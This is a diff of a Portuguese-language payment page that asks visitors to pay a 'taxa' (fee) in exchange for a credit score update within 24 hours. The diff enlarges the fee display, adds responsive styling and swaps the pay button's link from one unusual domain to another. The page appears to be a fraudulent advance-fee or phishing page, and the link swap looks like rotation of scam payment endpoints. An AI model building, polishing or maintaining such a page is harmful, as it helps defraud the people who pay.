--- a/index.html
+++ b/index.html
@@ -6,15 +6,16 @@
     <title>Pagamento</title>
     <style>
       body{font-family:Arial, sans-serif; background:#fafafa; margin:0; padding:0; text-align:center; color:#333;}
-      .container{max-width:600px; margin:40px auto; padding:20px;}
+      .container{max-width:720px; margin:40px auto; padding:20px;}
       h1{font-size:28px; font-weight:700; margin-bottom:8px;}
       .subtitle{color:#777; font-size:16px; margin-bottom:30px;}
-      .box{background:#eaf3ff; border-radius:12px; padding:20px; text-align:left; margin-bottom:30px; border:1px solid #d6e8ff;}
+      .box{background:#eaf3ff; border-radius:12px; padding:20px; text-align:left; margin-bottom:30px; border:1px solid #d6e8ff; max-width:100%;}
       .box p{margin:0 0 10px 0; line-height:1.5;}
 
-      .valor{background:#ffd8e6; border:1px solid #ffc1da; border-radius:12px; padding:25px; margin-bottom:30px;}
-      .valor h2{margin:0; color:#c72755; font-weight:700;} 
-      .valor .taxa{font-size:14px; margin-top:6px; color:#555;}
+      .valor{background:#ffd8e6; border:1px solid #ffc1da; border-radius:12px; padding:28px 25px; margin-bottom:30px;}
+      .valor > div{letter-spacing:.6px; font-size:13px; color:#c64a7a; font-weight:600; margin-bottom:10px;}
+      .valor h2{margin:0; color:#c72755; font-weight:800; font-size:56px; line-height:1;} 
+      .valor .taxa{font-size:14px; margin-top:10px; color:#555;}
 
       .proc{background:#eaf3ff; border-radius:12px; padding:20px; text-align:left; border:1px solid #d6e8ff;}
       .proc h3{margin:0 0 15px 0;}
@@ -22,6 +23,31 @@
 
       .btn{display:block; width:100%; background:#e50075; color:#fff; padding:15px; border-radius:12px; margin-top:30px; font-size:18px; font-weight:600; text-decoration:none;}
       .seguro{margin-top:15px; font-size:14px; color:#777;}
+
+      /* MOBILE / RESPONSIVE */
+      @media (max-width: 600px) {
+        .container { padding:18px; margin:28px auto; }
+        h1 { font-size:22px; }
+        .subtitle { font-size:14px; margin-bottom:18px; }
+
+        /* centralizar o conteúdo interno dos boxes no mobile */
+        .box, .proc, .valor { text-align: center; padding-left:16px; padding-right:16px; }
+
+        /* ajustar lista para centralizado mas com marcadores alinhados */
+        .proc ul { padding-left: 0; list-style-position: inside; text-align:left; display:inline-block; }
+
+        /* aumentar ainda mais o número da taxa em telas pequenas */
+        .valor h2 { font-size:72px; }
+
+        /* botão com bordas e sombra maior no mobile */
+        .btn { padding:16px; font-size:18px; border-radius:12px; box-shadow:0 8px 18px rgba(229,0,117,0.12); }
+      }
+
+      /* pequenas melhorias visuais em telas grandes */
+      @media (min-width: 1024px) {
+        .container { max-width:760px; }
+        .valor h2 { font-size:64px; }
+      }
     </style>
   </head>
   <body>
@@ -42,8 +68,6 @@
       </div>
 
       <div class="proc">
-
-	
         <h3>Processo após o pagamento</h3>
         <ul>
           <li>Confirmação automática do pagamento</li>
@@ -51,9 +75,8 @@
           <li>Atualização do score de crédito em até 24 horas</li>
         </ul>
       </div>
-	  
-	  <a href="https://pay.sitefeiraoparatodos.xyz/BNjzgPlVjaxgM78" class="btn">Pagar Taxa Agora</a>
 
+      <a href="https://pay.programacao-app-taxas.site/DYp0ZxVdMjQgmvX" class="btn">Pagar Taxa Agora</a>
 
       <div class="seguro">✔ Pagamento seguro e protegido</div>
     </div>
